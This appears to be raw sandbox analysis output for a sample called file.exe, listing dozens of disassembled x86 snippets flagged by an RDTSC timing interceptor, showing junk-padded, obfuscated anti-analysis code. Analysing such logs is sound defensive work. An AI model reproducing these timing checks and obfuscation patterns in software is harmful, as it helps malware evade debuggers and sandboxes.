Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A459 second address: D4A468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007F99D0D12E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A728 second address: D4A762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F35h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jmp 00007F99D0DE6F2Fh 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 jmp 00007F99D0DE6F2Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A762 second address: D4A772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F99D0D12E18h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D0C1 second address: D4D0C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D0C6 second address: D4D154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 59454047h 0x00000010 mov edx, dword ptr [ebp+122D2A33h] 0x00000016 push 00000003h 0x00000018 sub dword ptr [ebp+122D269Fh], esi 0x0000001e mov dl, ch 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F99D0D12E18h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov ecx, dword ptr [ebp+122D2CEFh] 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F99D0D12E18h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov cl, 9Eh 0x00000060 jmp 00007F99D0D12E29h 0x00000065 call 00007F99D0D12E19h 0x0000006a pushad 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D296 second address: D4D2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 jo 00007F99D0DE6F26h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D2AE second address: D4D2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D2B3 second address: D4D2DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99D0DE6F28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 ja 00007F99D0DE6F4Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99D0DE6F34h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D2DF second address: D4D31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c jmp 00007F99D0D12E28h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99D0D12E1Bh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D41774 second address: D4177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4177A second address: D41789 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99D0D12E16h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BDDD second address: D6BE01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F99D0DE6F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F99D0DE6F2Ah 0x00000012 pop ecx 0x00000013 popad 0x00000014 push edi 0x00000015 jo 00007F99D0DE6F2Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BF62 second address: D6BF6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99D0D12E22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BF6C second address: D6BF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F99D0DE6F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C383 second address: D6C389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C389 second address: D6C399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F99D0DE6F26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C4E7 second address: D6C505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F99D0D12E22h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C505 second address: D6C50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99D0DE6F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C50F second address: D6C53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99D0D12E25h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C53F second address: D6C54A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C7FB second address: D6C817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E20h 0x00000007 jp 00007F99D0D12E1Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6C9E5 second address: D6CA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F99D0DE6F2Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jg 00007F99D0DE6F28h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CCE3 second address: D6CCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CCF9 second address: D6CCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D649B9 second address: D649C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 je 00007F99D0D12E16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D649C5 second address: D649C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CFDB second address: D6CFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6CFDF second address: D6CFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D55F second address: D6D580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F99D0D12E16h 0x0000000a jmp 00007F99D0D12E27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D580 second address: D6D58A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0DE6F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D9BE second address: D6D9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DC99 second address: D6DCCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99D0DE6F2Ch 0x0000000d pop edx 0x0000000e pushad 0x0000000f push edx 0x00000010 jmp 00007F99D0DE6F30h 0x00000015 jmp 00007F99D0DE6F2Ah 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DCCF second address: D6DCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7224E second address: D72253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72253 second address: D72258 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72258 second address: D72299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jo 00007F99D0DE6F28h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F99D0DE6F32h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jnl 00007F99D0DE6F2Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70B39 second address: D70B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7125A second address: D71260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7377A second address: D73783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73783 second address: D73787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73787 second address: D73797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F99D0D12E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73797 second address: D7379B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7379B second address: D737A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7865E second address: D78662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78662 second address: D7867A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ebx 0x00000008 jnp 00007F99D0D12E18h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F99D0D12E16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78912 second address: D78918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78918 second address: D78925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F99D0D12E16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78D59 second address: D78D63 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78D63 second address: D78D6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99D0D12E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79025 second address: D79033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99D0DE6F26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7AF0D second address: D7AFAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jng 00007F99D0D12E39h 0x00000015 pop eax 0x00000016 mov dword ptr [ebp+122D316Eh], ecx 0x0000001c call 00007F99D0D12E19h 0x00000021 push eax 0x00000022 pushad 0x00000023 jmp 00007F99D0D12E25h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edi 0x0000002e jnl 00007F99D0D12E1Ch 0x00000034 pop edi 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007F99D0D12E28h 0x0000003e mov eax, dword ptr [eax] 0x00000040 push eax 0x00000041 push edx 0x00000042 jg 00007F99D0D12E1Ch 0x00000048 je 00007F99D0D12E16h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B260 second address: D7B27D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B27D second address: D7B2AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99D0D12E2Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F99D0D12E1Bh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B456 second address: D7B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B51A second address: D7B525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B5F5 second address: D7B5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B6E0 second address: D7B6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C1FE second address: D7C202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C283 second address: D7C2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Fh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F99D0D12E18h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007F99D0D12E16h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C7A5 second address: D7C7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7D160 second address: D7D16A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7D16A second address: D7D170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7D170 second address: D7D174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7E278 second address: D7E315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F99D0DE6F32h 0x0000000d jmp 00007F99D0DE6F35h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F99D0DE6F28h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e movzx esi, bx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F99D0DE6F28h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f call 00007F99D0DE6F37h 0x00000054 pop edi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 js 00007F99D0DE6F2Ch 0x0000005e jo 00007F99D0DE6F26h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB5A second address: D7EB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F5F8 second address: D7F5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB5E second address: D7EB68 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F860 second address: D7F864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F5FE second address: D7F602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB68 second address: D7EB8E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99D0DE6F37h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F99D0DE6F28h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F864 second address: D7F885 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99D0D12E23h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F602 second address: D7F606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB8E second address: D7EBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D801F1 second address: D801F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80ECC second address: D80ED2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80C8F second address: D80CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F99D0DE6F37h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnp 00007F99D0DE6F26h 0x00000015 jmp 00007F99D0DE6F2Dh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80ED2 second address: D80EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80EEA second address: D80F77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F99D0DE6F2Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F99D0DE6F28h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c cmc 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F99D0DE6F28h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D2956h] 0x00000051 or dword ptr [ebp+122D195Eh], edx 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F99D0DE6F39h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8190B second address: D819B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F99D0D12E2Dh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F99D0D12E18h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jmp 00007F99D0D12E1Ah 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1B61h], edi 0x00000038 mov di, dx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F99D0D12E18h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 je 00007F99D0D12E19h 0x0000005d movsx edi, cx 0x00000060 push esi 0x00000061 pop edi 0x00000062 xchg eax, ebx 0x00000063 jmp 00007F99D0D12E1Eh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D819B9 second address: D819C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D819C0 second address: D819C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
